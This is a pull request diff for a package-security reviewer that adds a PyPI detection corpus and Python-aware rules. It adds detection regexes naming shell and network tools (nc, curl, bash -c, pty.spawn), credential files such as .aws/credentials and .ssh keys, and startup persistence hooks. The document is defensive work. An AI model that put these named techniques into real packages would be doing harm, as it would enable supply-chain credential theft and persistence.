### PR TITLE
Add PyPI security-detection corpus and Python-aware rules

### DIFF
--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -102,8 +102,8 @@ fixtures in the same PR whenever a rule family's coverage changes (`PYPI_RULES_V
 `DETERMINISTIC_RULES_VERSION` in `review.ts`). The shared `code.*` rules were made Python-aware in
 `1.6.0` (subprocess/os.system, urllib.request/requests/socket, exec/`__import__`/base64-decode,
 os.environ/getpass/keyring); `pypi.*` grew `startup-hook`, `record-mismatch`, and `unusual-dependency`
-in `0.2.0`, and `setup-install-command` was upgraded to fire on top-level install-time code, not just
-`cmdclass`.
+in `0.2.0`, and `setup-install-command` was upgraded to fire on the top-level sdist `setup.py`
+install-time code, not just `cmdclass`.
 
 ### Fixture format
 

--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -99,11 +99,12 @@ A PyPI review runs two rule families over the staged artifacts:
 The harness asserts this per family: every `pypi.*` finding must equal `PYPI_RULES_VERSION` and every
 other finding must equal `DETERMINISTIC_RULES_VERSION`. Bump the relevant constant **and** update the
 fixtures in the same PR whenever a rule family's coverage changes (`PYPI_RULES_VERSION` in the adapter,
-`DETERMINISTIC_RULES_VERSION` in `review.ts`). The shared `code.*` rules were made Python-aware in
-`1.6.0` (subprocess/os.system, urllib.request/requests/socket, exec/`__import__`/base64-decode,
-os.environ/getpass/keyring); `pypi.*` grew `startup-hook`, `record-mismatch`, and `unusual-dependency`
-in `0.2.0`, and `setup-install-command` was upgraded to fire on the top-level sdist `setup.py`
-install-time code, not just `cmdclass`.
+`DETERMINISTIC_RULES_VERSION` in `review.ts`). The PyPI adapter opts the shared `code.*` rules into
+Python-aware matching in `1.6.0` (subprocess/os.system, urllib.request/requests/socket,
+exec/`__import__`/base64-decode, os.environ/getpass/keyring) while npm keeps the JavaScript matcher;
+`pypi.*` grew `startup-hook`, `record-mismatch`, and `unusual-dependency` in `0.2.0`, and
+`setup-install-command` was upgraded to fire on the top-level sdist `setup.py` install-time code, not
+just `cmdclass`.
 
 ### Fixture format
 

--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -80,3 +80,96 @@ The corpus deliberately records some product gaps instead of hiding them:
 3. Add exact expected findings and risk.
 4. If the scenario is important but not yet detected, add `coverageGaps` and assert the current diff-only behavior where possible.
 5. Run `pnpm run test:node -- security-corpus.test.mjs` before opening the PR.
+
+## PyPI corpus
+
+The PyPI adapter (`server/lib/adapters/pypi/index.ts`) has its own golden corpus under
+`test/fixtures/security-corpus/cases-pypi/`, evaluated by `test/security-corpus-pypi.test.mjs`. It is a
+separate harness, not an extension of the npm one, because PyPI findings legitimately carry two rule
+versions (see the invariant below).
+
+### Rule families and versions
+
+A PyPI review runs two rule families over the staged artifacts:
+
+- `pypi.*` findings come from `pyPiReleaseFindings` and carry `PYPI_RULES_VERSION` (currently `0.2.0`).
+- shared `file.*` / `code.*` / `diff.*` findings come from `deterministicFindings` and carry
+  `DETERMINISTIC_RULES_VERSION` (currently `1.6.0`).
+
+The harness asserts this per family: every `pypi.*` finding must equal `PYPI_RULES_VERSION` and every
+other finding must equal `DETERMINISTIC_RULES_VERSION`. Bump the relevant constant **and** update the
+fixtures in the same PR whenever a rule family's coverage changes (`PYPI_RULES_VERSION` in the adapter,
+`DETERMINISTIC_RULES_VERSION` in `review.ts`). The shared `code.*` rules were made Python-aware in
+`1.6.0` (subprocess/os.system, urllib/requests/socket, exec/`__import__`/base64-decode, os.environ/
+getpass/keyring); `pypi.*` grew `startup-hook`, `record-mismatch`, and `unusual-dependency` in `0.2.0`,
+and `setup-install-command` was upgraded to fire on top-level install-time code, not just `cmdclass`.
+
+### Fixture format
+
+Required fields:
+
+- `id`, `title`, `category`, `intent` — metadata.
+- `manifest` — parsed by `parsePyPiReleaseManifest`: schema `drydock.release-artifacts.v1`, ecosystem
+  `pypi`, `package`, `version`, and `artifacts[{path, sha256 (64 hex), url?}]`.
+- `artifacts` — `[{path, files: FileRecord[]}]`. Artifact paths must **exactly** match the manifest's
+  artifact paths or `assertManifestArtifactSet` throws.
+- `expectedRisk` — expected risk from `computeRisk()`.
+- `expectedFindings` — exact `{ruleId, severity, file}` entries.
+
+Optional fields:
+
+- `previousArtifacts` — previous-version `[{path, files}]`; enables `diff.*` findings.
+- `coverageGaps` — documented-only blind spots (not asserted).
+
+`FileRecord = {path, size, sha256, flags[], textSample?}`. A wheel fixture should include a
+`*.dist-info/WHEEL` file with a `Tag:` header so the diff namespace is deterministic; binary artifacts
+use `flags: ["binary"]` and omit `textSample`.
+
+### The two `expectedFindings[].file` namespacing schemes
+
+This is the most error-prone part of authoring fixtures. `pypi.*` findings and shared findings namespace
+file paths differently — `test/pypi.test.mjs` is the live oracle.
+
+- **Scheme A — `pypi.*` findings.** `namespacedPath(artifactPath, rawFilePath)`: the literal manifest
+  artifact path, then `/`, then the file's in-archive path. For **sdists** the in-archive path is first
+  root-stripped (`demo_package-1.2.0/setup.py` → `setup.py`). The `.dist-info` directory is **not**
+  normalized.
+  - wheel `.pth`: `dist/demo_package-1.2.0-py3-none-any.whl/demo_package/inject.pth`
+  - sdist `setup.py`: `dist/demo_package-1.2.0.tar.gz/setup.py`
+  - wheel METADATA: `dist/demo_package-1.2.0-py3-none-any.whl/demo_package-1.2.0.dist-info/METADATA`
+- **Scheme B — shared `file.*`/`code.*`/`diff.*` findings.** `artifactDiffNamespace(artifact)` + `/` +
+  `normalizePyPiDiffFilePath(rootStrippedPath)`. The namespace is `sdist` for sdists and
+  `wheel/<WHEEL Tag headers, sorted, joined with +>` for wheels (falling back to the `.whl` filename's
+  last three tags). `normalizePyPiDiffFilePath` collapses `<name>.dist-info/` → `.dist-info/`.
+  - shared finding on a wheel module: `wheel/py3-none-any/demo_package/collect.py`
+  - shared finding on a sdist `setup.py`: `sdist/setup.py`
+  - shared finding on wheel METADATA (as a diff entry): `wheel/py3-none-any/.dist-info/METADATA`
+
+A single file can fire findings from both families with different paths — e.g. an sdist `setup.py` with
+top-level `os.system`/`urllib` produces `pypi.setup-install-command` at `dist/…tar.gz/setup.py` (Scheme A)
+**and** `code.process-execution`/`code.network-access` at `sdist/setup.py` (Scheme B). List both tuples.
+
+### Known coverage gaps (PyPI)
+
+The corpus records these intentional blind spots rather than hiding them:
+
+- RECORD **hash** verification: only undeclared-file detection ships. RECORD digests are
+  `sha256=<base64url-nopad>` while `FileRecord.sha256` is hex, so digest comparison needs a format
+  conversion that is deferred. Truncated RECORD samples are skipped to avoid false positives.
+- `[build-system] backend-path` / PEP 517 in-tree build backends (arbitrary code at build time) are not
+  flagged; moderate false-positive risk with maturin/Cython.
+- Credential → network **taint chains**: capability tokens are flagged individually, not proven
+  source-to-sink.
+- Typosquatting / dependency-confusion name distance, maintainer/transfer signals, and package
+  reputation are not modeled (need registry intelligence; high false-positive risk).
+- `Requires-Dist` **diffing** between versions, `entry_points`/`console_scripts`, wheel `*.data/scripts/`,
+  and `.pyc`-only distribution are not yet analyzed.
+- Native `.so`/`.pyd` presence stays high severity but is a known false-positive source for legitimate
+  compiled packages (NumPy etc.).
+- Regexes are not a parser: even Python-aware, obfuscation can evade the `code.*` rules.
+
+### Running
+
+- PyPI corpus only: `pnpm run test:node -- security-corpus-pypi.test.mjs`
+- Regression net after a rules-version bump: `pnpm run test:node -- security-corpus.test.mjs pypi.test.mjs`
+- Full pre-commit parity: `pnpm run verify`

--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -100,9 +100,10 @@ The harness asserts this per family: every `pypi.*` finding must equal `PYPI_RUL
 other finding must equal `DETERMINISTIC_RULES_VERSION`. Bump the relevant constant **and** update the
 fixtures in the same PR whenever a rule family's coverage changes (`PYPI_RULES_VERSION` in the adapter,
 `DETERMINISTIC_RULES_VERSION` in `review.ts`). The shared `code.*` rules were made Python-aware in
-`1.6.0` (subprocess/os.system, urllib/requests/socket, exec/`__import__`/base64-decode, os.environ/
-getpass/keyring); `pypi.*` grew `startup-hook`, `record-mismatch`, and `unusual-dependency` in `0.2.0`,
-and `setup-install-command` was upgraded to fire on top-level install-time code, not just `cmdclass`.
+`1.6.0` (subprocess/os.system, urllib.request/requests/socket, exec/`__import__`/base64-decode,
+os.environ/getpass/keyring); `pypi.*` grew `startup-hook`, `record-mismatch`, and `unusual-dependency`
+in `0.2.0`, and `setup-install-command` was upgraded to fire on top-level install-time code, not just
+`cmdclass`.
 
 ### Fixture format
 
@@ -134,7 +135,7 @@ file paths differently — `test/pypi.test.mjs` is the live oracle.
   artifact path, then `/`, then the file's in-archive path. For **sdists** the in-archive path is first
   root-stripped (`demo_package-1.2.0/setup.py` → `setup.py`). The `.dist-info` directory is **not**
   normalized.
-  - wheel `.pth`: `dist/demo_package-1.2.0-py3-none-any.whl/demo_package/inject.pth`
+  - wheel install-root `.pth`: `dist/demo_package-1.2.0-py3-none-any.whl/inject.pth`
   - sdist `setup.py`: `dist/demo_package-1.2.0.tar.gz/setup.py`
   - wheel METADATA: `dist/demo_package-1.2.0-py3-none-any.whl/demo_package-1.2.0.dist-info/METADATA`
 - **Scheme B — shared `file.*`/`code.*`/`diff.*` findings.** `artifactDiffNamespace(artifact)` + `/` +
@@ -146,8 +147,12 @@ file paths differently — `test/pypi.test.mjs` is the live oracle.
   - shared finding on wheel METADATA (as a diff entry): `wheel/py3-none-any/.dist-info/METADATA`
 
 A single file can fire findings from both families with different paths — e.g. an sdist `setup.py` with
-top-level `os.system`/`urllib` produces `pypi.setup-install-command` at `dist/…tar.gz/setup.py` (Scheme A)
-**and** `code.process-execution`/`code.network-access` at `sdist/setup.py` (Scheme B). List both tuples.
+top-level `os.system`/`urllib.request` produces `pypi.setup-install-command` at
+`dist/…tar.gz/setup.py` (Scheme A) **and** `code.process-execution`/`code.network-access` at
+`sdist/setup.py` (Scheme B). List both tuples.
+For startup-hook fixtures, only files installed at Python's site root are expected to fire:
+top-level wheel files and wheel `.data/{purelib,platlib}/` files count; package-internal files such as
+`demo_package/sitecustomize.py` or `demo_package/inject.pth` do not.
 
 ### Known coverage gaps (PyPI)
 

--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -102,7 +102,9 @@ fixtures in the same PR whenever a rule family's coverage changes (`PYPI_RULES_V
 `DETERMINISTIC_RULES_VERSION` in `review.ts`). The PyPI adapter opts the shared `code.*` rules into
 Python-aware matching in `1.6.0` (subprocess/os.system, urllib.request/requests/socket,
 exec/`__import__`/base64-decode, os.environ/getpass/keyring) while npm keeps the JavaScript matcher;
-`pypi.*` grew `startup-hook`, `record-mismatch`, and `unusual-dependency` in `0.2.0`, and
+the same Python matcher must be used when annotating modified-file findings so release-risk
+classification stays consistent for extensionless Python files. `pypi.*` grew `startup-hook`,
+`record-mismatch`, and `unusual-dependency` in `0.2.0`, and
 `setup-install-command` was upgraded to fire on the top-level sdist `setup.py` install-time code, not
 just `cmdclass`.
 

--- a/server/lib/adapters/pypi/index.ts
+++ b/server/lib/adapters/pypi/index.ts
@@ -735,7 +735,13 @@ function pyPiReleaseFindings(
 // sample was truncated, since an incomplete path list would flag legitimate files.
 function undeclaredWheelFiles(artifact: PyPiPreparedArtifact, recordPath: string): FileRecord[] {
   const recordFile = artifact.files.find((file) => file.path === recordPath);
-  if (!recordFile?.textSample || recordFile.flags.includes("truncated")) return [];
+  if (
+    !recordFile ||
+    recordFile.textSample === undefined ||
+    recordFile.flags.includes("truncated")
+  ) {
+    return [];
+  }
   const declared = new Set<string>();
   for (const line of recordFile.textSample.split(/\r?\n/)) {
     if (!line.trim()) continue;
@@ -749,7 +755,6 @@ function undeclaredWheelFiles(artifact: PyPiPreparedArtifact, recordPath: string
     }
     if (path) declared.add(path);
   }
-  if (!declared.size) return [];
   return artifact.files.filter((file) => !declared.has(file.path));
 }
 

--- a/server/lib/adapters/pypi/index.ts
+++ b/server/lib/adapters/pypi/index.ts
@@ -2,6 +2,7 @@ import {
   computeRisk,
   createPackageDiff,
   deterministicFindings,
+  EXECUTION_CAPABILITY_PATTERNS,
   redactFindings,
   summarizePackageJsonDiff,
   type DiffEntry,
@@ -21,16 +22,29 @@ import type {
 } from "../types";
 
 export const PYPI_RELEASE_MANIFEST_SCHEMA = "drydock.release-artifacts.v1";
-export const PYPI_RULES_VERSION = "0.1.0";
+export const PYPI_RULES_VERSION = "0.2.0";
 
 export const PYPI_RULE_IDS = {
   metadataMissing: "pypi.metadata-missing",
   metadataMismatch: "pypi.metadata-mismatch",
   wheelRecordMissing: "pypi.wheel-record-missing",
+  recordMismatch: "pypi.record-mismatch",
   pthExecution: "pypi.pth-execution",
+  startupHook: "pypi.startup-hook",
   setupInstallCommand: "pypi.setup-install-command",
+  unusualDependency: "pypi.unusual-dependency",
   nativeArtifact: "pypi.native-artifact",
 } as const;
+
+const SETUP_INSTALL_COMMAND_PATTERNS = [
+  /\bcmdclass\b/,
+  /\bsetuptools\.command\.install\b/,
+  /\bdistutils\.command\.install\b/,
+];
+
+// PEP 508 direct references (`name @ <scheme>://…`). PyPI forbids these in
+// uploaded metadata, so their presence in Requires-Dist is itself anomalous.
+const DIRECT_REFERENCE_REQUIREMENT_RE = /@\s*[a-z][a-z0-9+.-]*:\/\//i;
 
 export type PyPiArtifactKind = "wheel" | "sdist";
 
@@ -609,6 +623,35 @@ function pyPiReleaseFindings(
         }),
       );
     }
+
+    const directReferenceDeps = summary.requiresDist.filter((requirement) =>
+      DIRECT_REFERENCE_REQUIREMENT_RE.test(requirement),
+    );
+    if (directReferenceDeps.length) {
+      findings.push(
+        tag("unusualDependency", {
+          severity: "high",
+          file: metadataEvidencePath,
+          evidence: `direct-reference dependency: ${directReferenceDeps.join(", ")}`,
+          reason:
+            "PEP 508 direct-URL/VCS dependencies bypass the PyPI registry and pull unreviewed code from an arbitrary location",
+        }),
+      );
+    }
+
+    if (artifact.kind === "wheel" && summary.wheel?.recordPath) {
+      for (const undeclared of undeclaredWheelFiles(artifact, summary.wheel.recordPath)) {
+        findings.push(
+          tag("recordMismatch", {
+            severity: "high",
+            file: namespacedPath(artifact.path, undeclared.path),
+            evidence: `${undeclared.path} is present in the wheel but not listed in RECORD`,
+            reason:
+              "files absent from the wheel RECORD can be installed without integrity tracking and indicate archive tampering",
+          }),
+        );
+      }
+    }
   }
 
   for (const artifact of artifacts) {
@@ -631,26 +674,42 @@ function pyPiReleaseFindings(
           }),
         );
       }
-      if (
-        /(^|\/)setup\.py$/i.test(file.path) &&
-        /\b(cmdclass|setuptools\.command\.install|distutils\.command\.install)\b/.test(
-          file.textSample ?? "",
-        )
-      ) {
+      if (/(^|\/)(sitecustomize|usercustomize)\.py$/i.test(file.path)) {
         findings.push(
-          tag("setupInstallCommand", {
+          tag("startupHook", {
             severity: "high",
             file: filePath,
-            line: firstMatchingLine(file.textSample, [
-              /\bcmdclass\b/,
-              /\bsetuptools\.command\.install\b/,
-              /\bdistutils\.command\.install\b/,
-            ]),
-            evidence: "setup.py custom install command",
+            evidence: `${file.path.split("/").at(-1)} runs automatically on interpreter startup`,
             reason:
-              "custom Python install commands can run maintainer-controlled code during package installation",
+              "sitecustomize.py and usercustomize.py execute on every Python startup once installed, a common persistence hook",
           }),
         );
+      }
+      if (/(^|\/)setup\.py$/i.test(file.path)) {
+        const setupText = file.textSample ?? "";
+        const matchedInstallCommand = SETUP_INSTALL_COMMAND_PATTERNS.some((pattern) =>
+          pattern.test(setupText),
+        );
+        const matchedExecution = EXECUTION_CAPABILITY_PATTERNS.some((pattern) =>
+          pattern.test(setupText),
+        );
+        if (matchedInstallCommand || matchedExecution) {
+          findings.push(
+            tag("setupInstallCommand", {
+              severity: "high",
+              file: filePath,
+              line: firstMatchingLine(setupText, [
+                ...SETUP_INSTALL_COMMAND_PATTERNS,
+                ...EXECUTION_CAPABILITY_PATTERNS,
+              ]),
+              evidence: matchedInstallCommand
+                ? "setup.py custom install command"
+                : "setup.py executes code at install time",
+              reason:
+                "pip runs setup.py when installing an sdist, so process, network, or dynamic-eval code there runs on the consumer machine",
+            }),
+          );
+        }
       }
       if (/\.(pyd)$/i.test(file.path)) {
         findings.push(
@@ -667,6 +726,28 @@ function pyPiReleaseFindings(
   }
 
   return findings;
+}
+
+// Files present in the wheel but absent from its RECORD. Skips when the RECORD
+// sample was truncated, since an incomplete path list would flag legitimate files.
+function undeclaredWheelFiles(artifact: PyPiPreparedArtifact, recordPath: string): FileRecord[] {
+  const recordFile = artifact.files.find((file) => file.path === recordPath);
+  if (!recordFile?.textSample || recordFile.flags.includes("truncated")) return [];
+  const declared = new Set<string>();
+  for (const line of recordFile.textSample.split(/\r?\n/)) {
+    if (!line.trim()) continue;
+    let path: string;
+    if (line.startsWith('"')) {
+      const close = line.indexOf('"', 1);
+      path = close > 0 ? line.slice(1, close) : line;
+    } else {
+      const comma = line.indexOf(",");
+      path = comma >= 0 ? line.slice(0, comma) : line;
+    }
+    if (path) declared.add(path);
+  }
+  if (!declared.size) return [];
+  return artifact.files.filter((file) => !declared.has(file.path));
 }
 
 function tag(

--- a/server/lib/adapters/pypi/index.ts
+++ b/server/lib/adapters/pypi/index.ts
@@ -591,9 +591,7 @@ function pyPiReleaseFindings(
             "release gates need package name and version metadata to prove the artifact matches the reviewed manifest",
         }),
       );
-      continue;
-    }
-    if (normalizePyPiProjectName(summary.name) !== manifestName) {
+    } else if (normalizePyPiProjectName(summary.name) !== manifestName) {
       findings.push(
         tag("metadataMismatch", {
           severity: "critical",
@@ -603,7 +601,7 @@ function pyPiReleaseFindings(
         }),
       );
     }
-    if (summary.version !== manifest.version) {
+    if (summary.version && summary.version !== manifest.version) {
       findings.push(
         tag("metadataMismatch", {
           severity: "critical",
@@ -688,7 +686,7 @@ function pyPiReleaseFindings(
           }),
         );
       }
-      if (/(^|\/)setup\.py$/i.test(file.path)) {
+      if (artifact.kind === "sdist" && /^setup\.py$/i.test(file.path)) {
         const setupText = file.textSample ?? "";
         const matchedInstallCommand = SETUP_INSTALL_COMMAND_PATTERNS.some((pattern) =>
           pattern.test(setupText),

--- a/server/lib/adapters/pypi/index.ts
+++ b/server/lib/adapters/pypi/index.ts
@@ -657,7 +657,7 @@ function pyPiReleaseFindings(
   for (const artifact of artifacts) {
     for (const file of artifact.files) {
       const filePath = namespacedPath(artifact.path, file.path);
-      if (/\.pth$/i.test(file.path)) {
+      if (/\.pth$/i.test(file.path) && isPythonInstallRootFile(artifact, file.path)) {
         const hasImportLine = Boolean(
           file.textSample?.split(/\r?\n/).some((line) => /^\s*import\s+/.test(line)),
         );
@@ -674,7 +674,10 @@ function pyPiReleaseFindings(
           }),
         );
       }
-      if (/(^|\/)(sitecustomize|usercustomize)\.py$/i.test(file.path)) {
+      if (
+        /(^|\/)(sitecustomize|usercustomize)\.py$/i.test(file.path) &&
+        isPythonInstallRootFile(artifact, file.path)
+      ) {
         findings.push(
           tag("startupHook", {
             severity: "high",
@@ -748,6 +751,13 @@ function undeclaredWheelFiles(artifact: PyPiPreparedArtifact, recordPath: string
   }
   if (!declared.size) return [];
   return artifact.files.filter((file) => !declared.has(file.path));
+}
+
+function isPythonInstallRootFile(artifact: PyPiPreparedArtifact, filePath: string): boolean {
+  const normalized = filePath.replace(/^\/+/, "");
+  if (!normalized.includes("/")) return true;
+  if (artifact.kind !== "wheel") return false;
+  return /^[^/]+\.data\/(?:purelib|platlib)\/[^/]+$/i.test(normalized);
 }
 
 function tag(

--- a/server/lib/adapters/pypi/index.ts
+++ b/server/lib/adapters/pypi/index.ts
@@ -158,6 +158,7 @@ const PYPI_ARTIFACT_LIMIT = 20;
 
 export const pypiAdapter: PackageAdapter<PyPiAdapterInput, PyPiBroker> = {
   id: "pypi",
+  codePatternSet: "python",
 
   parseInput(raw: unknown): PyPiAdapterInput {
     return parsePyPiAdapterInput(raw);

--- a/server/lib/adapters/pypi/index.ts
+++ b/server/lib/adapters/pypi/index.ts
@@ -2,7 +2,7 @@ import {
   computeRisk,
   createPackageDiff,
   deterministicFindings,
-  EXECUTION_CAPABILITY_PATTERNS,
+  PYTHON_EXECUTION_CAPABILITY_PATTERNS,
   redactFindings,
   summarizePackageJsonDiff,
   type DiffEntry,
@@ -178,7 +178,9 @@ export const pypiAdapter: PackageAdapter<PyPiAdapterInput, PyPiBroker> = {
   runFindings(args) {
     const details = args.details as PyPiAdapterDetails;
     return [
-      ...deterministicFindings(args.staged.files, args.fileDiff, null),
+      ...deterministicFindings(args.staged.files, args.fileDiff, null, {
+        codePatternSet: "python",
+      }),
       ...pyPiReleaseFindings(details.manifest, details.preparedArtifacts),
     ];
   },
@@ -691,7 +693,7 @@ function pyPiReleaseFindings(
         const matchedInstallCommand = SETUP_INSTALL_COMMAND_PATTERNS.some((pattern) =>
           pattern.test(setupText),
         );
-        const matchedExecution = EXECUTION_CAPABILITY_PATTERNS.some((pattern) =>
+        const matchedExecution = PYTHON_EXECUTION_CAPABILITY_PATTERNS.some((pattern) =>
           pattern.test(setupText),
         );
         if (matchedInstallCommand || matchedExecution) {
@@ -701,7 +703,7 @@ function pyPiReleaseFindings(
               file: filePath,
               line: firstMatchingLine(setupText, [
                 ...SETUP_INSTALL_COMMAND_PATTERNS,
-                ...EXECUTION_CAPABILITY_PATTERNS,
+                ...PYTHON_EXECUTION_CAPABILITY_PATTERNS,
               ]),
               evidence: matchedInstallCommand
                 ? "setup.py custom install command"

--- a/server/lib/adapters/pypi/index.ts
+++ b/server/lib/adapters/pypi/index.ts
@@ -753,8 +753,8 @@ function undeclaredWheelFiles(artifact: PyPiPreparedArtifact, recordPath: string
 
 function isPythonInstallRootFile(artifact: PyPiPreparedArtifact, filePath: string): boolean {
   const normalized = filePath.replace(/^\/+/, "");
-  if (!normalized.includes("/")) return true;
   if (artifact.kind !== "wheel") return false;
+  if (!normalized.includes("/")) return true;
   return /^[^/]+\.data\/(?:purelib|platlib)\/[^/]+$/i.test(normalized);
 }
 

--- a/server/lib/adapters/types.ts
+++ b/server/lib/adapters/types.ts
@@ -1,5 +1,6 @@
 import type { AppDb, WorkspaceSession } from "../../db";
 import type {
+  CodePatternSet,
   DiffEntry,
   FileRecord,
   Finding,
@@ -85,6 +86,9 @@ export interface AdapterBroker {
 export interface PackageAdapter<TInput = unknown, TBroker extends AdapterBroker = AdapterBroker> {
   /** Stable id used in persistence + logs. */
   readonly id: string;
+
+  /** Code-pattern family used when classifying changed-line findings. */
+  readonly codePatternSet?: CodePatternSet;
 
   /** Validate the route/queue payload into the adapter's typed input shape. */
   parseInput(raw: unknown): TInput;

--- a/server/lib/review.ts
+++ b/server/lib/review.ts
@@ -26,7 +26,7 @@ export interface Finding {
 // way that should invalidate cached scan reports. Stored alongside each
 // finding so historical reports can be traced back to the ruleset that
 // produced them.
-export const DETERMINISTIC_RULES_VERSION = "1.5.0";
+export const DETERMINISTIC_RULES_VERSION = "1.6.0";
 
 export const DETERMINISTIC_RULE_IDS = {
   installScriptPreinstall: "install-script.preinstall",
@@ -122,6 +122,13 @@ const PROCESS_EXECUTION_PATTERNS = [
   /\bnc\s/,
   /\bbash\s+-c/,
   /\bpowershell\s/,
+  // Python process/shell sinks.
+  /\bsubprocess\b/,
+  /\bos\.system\s*\(/,
+  /\bos\.popen\s*\(/,
+  /\bPopen\s*\(/,
+  /\bpty\.spawn\s*\(/,
+  /\bcommands\.getoutput\s*\(/,
 ];
 const NETWORK_ACCESS_PATTERNS = [
   /\brequire\(["'](?:node:)?(?:http|https|net|dns)["']\)/,
@@ -129,6 +136,15 @@ const NETWORK_ACCESS_PATTERNS = [
   /\bfetch\s*\(/,
   /\bXMLHttpRequest\b/,
   /\baxios\s*\./,
+  // Python network sinks.
+  /\burllib(?:\.request)?\b/,
+  /\brequests\.(?:get|post|put|patch|delete|request)\b/,
+  /\bhttp\.client\b/,
+  /\bhttplib\b/,
+  /\bsocket\.socket\s*\(/,
+  /\bftplib\b/,
+  /\bsmtplib\b/,
+  /\burlopen\s*\(/,
 ];
 const DYNAMIC_EVALUATION_PATTERNS = [
   /\beval\s*\(/,
@@ -136,6 +152,19 @@ const DYNAMIC_EVALUATION_PATTERNS = [
   /\bWebAssembly\.compile\s*\(/,
   /\batob\s*\(/,
   /\bBuffer\.from\s*\([^,]+,\s*["']base64["']\s*\)/,
+  // Python dynamic-eval and obfuscation primitives. The lookbehind keeps the
+  // bare `exec(`/`compile(` builtins from matching JS method calls such as
+  // `regex.exec(` or `WebAssembly.compile(` (already covered above).
+  /(?<!\.)\bexec\s*\(/,
+  /\b__import__\s*\(/,
+  /\bimportlib\b/,
+  /\bmarshal\.loads\s*\(/,
+  /(?<!\.)\bcompile\s*\(/,
+  /\bbase64\.b(?:64|32|16)decode\s*\(/,
+  /\bzlib\.decompress\s*\(/,
+  /\blzma\.decompress\s*\(/,
+  /\bcodecs\.decode\s*\(/,
+  /\bbytes\.fromhex\s*\(/,
 ];
 const CREDENTIAL_ACCESS_PATTERNS = [
   /\bprocess\.env\b/,
@@ -144,6 +173,23 @@ const CREDENTIAL_ACCESS_PATTERNS = [
   /\bGITHUB_TOKEN\b/,
   /\bAWS_SECRET\b/,
   /\bPRIVATE_KEY\b/,
+  // Python credential/environment access.
+  /\bos\.environ\b/,
+  /\bos\.getenv\s*\(/,
+  /\bgetpass\b/,
+  /\bkeyring\b/,
+  /\.aws\/credentials/,
+  /\.ssh\/id_/,
+  /\.netrc/,
+];
+
+// Process-execution, network, and dynamic-evaluation capability in one set.
+// Reused by ecosystem adapters that need to know whether a file executes code
+// (e.g. a PyPI sdist's setup.py, which pip runs at install time).
+export const EXECUTION_CAPABILITY_PATTERNS = [
+  ...PROCESS_EXECUTION_PATTERNS,
+  ...NETWORK_ACCESS_PATTERNS,
+  ...DYNAMIC_EVALUATION_PATTERNS,
 ];
 
 const SECRET_PATTERNS: Array<[RegExp, string]> = [
@@ -245,11 +291,7 @@ export function deterministicFindings(
     const changed = diffByPath.get(file.path)?.status;
     const changedPrefix = changed && changed !== "unchanged" ? `new/changed ${changed} file: ` : "";
 
-    if (
-      /\b(child_process|execSync|execFileSync|spawn\(|spawnSync\(|curl\s|wget\s|nc\s|bash\s+-c|powershell\s)/.test(
-        sample,
-      )
-    ) {
+    if (PROCESS_EXECUTION_PATTERNS.some((pattern) => pattern.test(sample))) {
       findings.push(
         tag("codeProcessExecution", {
           severity: "high",
@@ -260,11 +302,7 @@ export function deterministicFindings(
         }),
       );
     }
-    if (
-      /\b(require\(["'](?:node:)?(?:http|https|net|dns)["']\)|from\s+["'](?:node:)?(?:http|https|net|dns)["']|fetch\s*\(|XMLHttpRequest|axios\s*\.)/.test(
-        sample,
-      )
-    ) {
+    if (NETWORK_ACCESS_PATTERNS.some((pattern) => pattern.test(sample))) {
       findings.push(
         tag("codeNetworkAccess", {
           severity: changed === "added" ? "high" : "medium",
@@ -276,13 +314,7 @@ export function deterministicFindings(
         }),
       );
     }
-    if (
-      /\beval\s*\(/.test(sample) ||
-      /\bnew\s+Function\s*\(/.test(sample) ||
-      /\bWebAssembly\.compile\s*\(/.test(sample) ||
-      /\batob\s*\(/.test(sample) ||
-      /\bBuffer\.from\s*\([^,]+,\s*["']base64["']\s*\)/.test(sample)
-    ) {
+    if (DYNAMIC_EVALUATION_PATTERNS.some((pattern) => pattern.test(sample))) {
       findings.push(
         tag("codeDynamicEvaluation", {
           severity: changed === "added" ? "high" : "medium",
@@ -293,9 +325,7 @@ export function deterministicFindings(
         }),
       );
     }
-    if (
-      /\b(process\.env|npm_config_|NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET|PRIVATE_KEY)\b/.test(sample)
-    ) {
+    if (CREDENTIAL_ACCESS_PATTERNS.some((pattern) => pattern.test(sample))) {
       findings.push(
         tag("codeCredentialAccess", {
           severity: changed === "added" ? "high" : "medium",

--- a/server/lib/review.ts
+++ b/server/lib/review.ts
@@ -162,7 +162,7 @@ const JS_DYNAMIC_EVALUATION_PATTERNS = [
 const PYTHON_DYNAMIC_EVALUATION_PATTERNS = [
   /(?<!\.)\bexec\s*\(/,
   /\b__import__\s*\(/,
-  /\bimportlib\b/,
+  /\bimportlib\.import_module\s*\(/,
   /\bmarshal\.loads\s*\(/,
   /(?<!\.)\bcompile\s*\(/,
   /\bbase64\.b(?:64|32|16)decode\s*\(/,

--- a/server/lib/review.ts
+++ b/server/lib/review.ts
@@ -109,9 +109,13 @@ export interface FindingAnnotationOptions {
   persistedAnnotations?: Map<string, FindingDiffAnnotation>;
 }
 
+export interface DeterministicFindingOptions {
+  codePatternSet?: "javascript" | "python";
+}
+
 const LIFECYCLE_SCRIPTS = ["preinstall", "install", "postinstall", "prepare"];
 const RISK_RANK: Record<RiskLevel, number> = { low: 0, medium: 1, high: 2, critical: 3 };
-const PROCESS_EXECUTION_PATTERNS = [
+const JS_PROCESS_EXECUTION_PATTERNS = [
   /\bchild_process\b/,
   /\bexecSync\b/,
   /\bexecFileSync\b/,
@@ -122,7 +126,8 @@ const PROCESS_EXECUTION_PATTERNS = [
   /\bnc\s/,
   /\bbash\s+-c/,
   /\bpowershell\s/,
-  // Python process/shell sinks.
+];
+const PYTHON_PROCESS_EXECUTION_PATTERNS = [
   /\bsubprocess\b/,
   /\bos\.system\s*\(/,
   /\bos\.popen\s*\(/,
@@ -130,13 +135,14 @@ const PROCESS_EXECUTION_PATTERNS = [
   /\bpty\.spawn\s*\(/,
   /\bcommands\.getoutput\s*\(/,
 ];
-const NETWORK_ACCESS_PATTERNS = [
+const JS_NETWORK_ACCESS_PATTERNS = [
   /\brequire\(["'](?:node:)?(?:http|https|net|dns)["']\)/,
   /\bfrom\s+["'](?:node:)?(?:http|https|net|dns)["']/,
   /\bfetch\s*\(/,
   /\bXMLHttpRequest\b/,
   /\baxios\s*\./,
